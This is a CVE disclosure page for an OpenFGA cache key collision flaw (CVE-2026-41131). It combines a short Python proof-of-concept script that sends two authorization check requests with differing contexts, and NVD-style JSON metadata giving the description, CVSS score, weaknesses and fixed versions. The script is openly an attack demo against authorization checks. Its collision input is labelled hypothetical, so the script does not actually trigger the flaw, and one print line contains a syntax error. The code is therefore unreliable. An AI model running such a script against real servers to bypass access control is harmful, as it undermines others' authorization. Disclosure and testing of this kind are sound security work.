CVE-2026-41131

#!/usr/bin/env python3 """ PoC for CVE-2026-41131 (OpenFGA Cache Key Collision) This script demonstrates the concept where two different requests might result in a cache hit, bypassing condition evaluation. """ import requests import json TARGET_URL = "http://localhost:8080" STORE_ID = "target_store_id" MODEL_ID = "target_model_id" def make_request(user, object, relation, context): endpoint = f"{TARGET_URL}/stores/{STORE_ID}/check" headers = {"Content-Type": "application/json"} payload = { "tuple_key": { "user": user, "object": object, "relation": relation }, "authorization_model_id": MODEL_ID, "context": context } response = requests.post(endpoint, headers=headers, data=json.dumps(payload)) return response.json() # Step 1: Send a request with context that allows access # This result gets cached under a specific Key A print("[+] Sending request 1 with valid admin context...")") ctx_admin = {"level": "admin", "region": "us"} resp1 = make_request("user:alice", "doc:1", "viewer", ctx_admin) print(f" Response: {resp1}") # Step 2: Send a request with a different context (e.g., guest) # Vulnerability: This generates the same Cache Key A # System returns cached 'allowed' result instead of evaluating guest context print("[+] Sending request 2 with guest context (triggering collision)...") ctx_guest = {"level": "guest", "region": "eu"} # Hypothetical collision context resp2 = make_request("user:bob", "doc:1", "viewer", ctx_guest) print(f" Response: {resp2}") if resp2.get('allowed') == True: print("[!] Vulnerability confirmed: Guest access granted via cache poisoning.") else: print("[-] Access denied correctly or target not vulnerable.")

{"cve": {"id": "CVE-2026-41131", "sourceIdentifier": "[email protected]", "published": "2026-04-22T00:16:29.013", "lastModified": "2026-04-24T13:44:37.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenFGA is an authorization/permission engine built for developers. Prior to version 1.14.1, in specific scenarios, models using conditions with caching enabled can result in two different check requests producing the same cache key. This could result in OpenFGA reusing an earlier cached result for a subsequent request. The preconditions for vulnerability are the model having relations which rely on condition evaluation and the user having caching enabled. OpenFGA v1.14.1 contains a fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-706"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openfga:helm_charts:*:*:*:*:*:openfga:*:*", "versionEndExcluding": "0.3.1", "matchCriteriaId": "8E5C9CC5-31C7-4307-89E8-513DB9C4E1A8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openfga:openfga:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.14.1", "matchCriteriaId": "AD90DCAE-2F12-4225-9B25-6DACB03F56C7"}]}]}], "references": [{"url": "https://github.com/openfga/openfga/releases/tag/v1.14.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/openfga/openfga/security/advisories/GHSA-57j5-qwp2-vqp6", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}